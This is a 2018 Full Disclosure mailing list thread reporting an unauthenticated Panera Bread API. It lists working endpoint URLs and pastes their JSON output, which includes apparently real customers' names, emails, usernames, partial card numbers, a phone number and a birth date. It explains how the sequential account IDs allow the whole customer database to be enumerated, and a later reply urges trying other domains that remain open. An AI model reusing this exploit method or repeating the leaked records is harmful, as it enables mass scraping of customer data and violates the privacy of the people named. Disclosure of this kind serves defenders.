They didn’t fix the other domains from resolving their weblogic / Hyperion site. Try catering, etc.....
Sent from ProtonMail Mobile On Tue, Apr 3, 2018 at 11:17, (RS) Tyler Schroder <[email protected]> wrote: > A correction seems to be issued for both endpoints, POC links are returning > "INVALID_SESSION". Might still be breakable given some time, but something > tells me they're getting a lot of free pentesting right now :) R. S. Tyler > Schroder -----Original Message----- From: Fulldisclosure > [mailto:[email protected]] On Behalf Of Jack Beanstalk > Sent: Monday, April 2, 2018 3:43 PM To: [email protected] Subject: > [FD] Massive Breach in Panera Bread > 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7 I'd like to > report a security vulnerability in Panera Bread's web application. There is a > publicly available, completely unauthenticated API endpoint that allows > anyone to access the following information about anyone who has ever signed > up for an account to order food from Panera Bread: 1. Username 2. First and > last name 3. Email address 4. Phone number 5. Birthday 6. Last four digits of > saved credit card number 7. Saved home address 8. Social account integration > information 9. Saved user food preferences and dietary restrictions Here are > the API endpoints which you can use to verify this information: 1. > https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000 > This returns the following JSON: {"accounts": > [{"username":"denys","name":"romona > ruiz","cardNumber":"********6515"},{"username":"[email protected]","name > ":"Marie > Mulcahy","cardNumber":"********5527"},{"username":"[email protected]","name":"F > B","cardNumber":"********7921"},{"username":"[email protected]","name":"C > Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg > e > Alcalde","cardNumber":"********6129"},{"username":"[email protected]","na > me":"Kei > Kino","cardNumber":"********6061"},{"username":"[email protected]", > "name":"jan > jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny > poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo > ianello","cardNumber":"********8386"},{"username":"[email protected]","name" > :"Deborah > LaPerch","cardNumber":"********5384"},{"username":"[email protected]"," > name":"sadie > bagnoni","cardNumber":"********5144"},{"username":"[email protected]","na > me":"Marea > needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT > ESSA > SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet > h > forlenzo","cardNumber":"********7085"},{"username":"[email protected]","nam > e":"juline > G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo > Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur > hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise > longua","cardNumber":"********0102"},{"username":"[email protected]","n > ame":"Sandra > Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia > fulchek","cardNumber":"********2654"}]} Note that you can look up > usernames/email addresses for Panera Bread accounts if you know the target's > phone number. This returns the username/email address and last four digits of > the saved credit card of every user who has ever signed up with that phone > number. 2. > https://delivery.panerabread.com/foundation-api/users/uramp/7382194 This > returns the following JSON: > {"customerId":7382194,"username":"[email protected]","firstName":"Anthony","l > astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23 > 860763,"emailAddress":"[email protected]","emailType":"Personal","isDefault": > true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber" > :"7032662951","phoneType":"Residential","countryCode":"1","extension":null," > name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru > e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f > alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa > lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user > Preferences":{"foodPreferences":[{"code":3,"displayName":"Low > Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with > family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayNa > me":"Reward Reminders & Expiration > Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ > ayName":"Panera Bread Updates & Special > Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio > nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2 > ,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions" > :{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[ > ]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]} In this > context, "7382194" is the user's account ID. Panera Bread uses sequential > integers for account IDs, which means that if your goal is to gather as much > information as you can instead about someone, you can simply increment > through the accounts and collect as much as you'd like, up to and including > the entire database. Hopefully they'll fix this if it gets enough attention. > _______________________________________________ Sent through the Full > Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web > Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full > Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web > Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
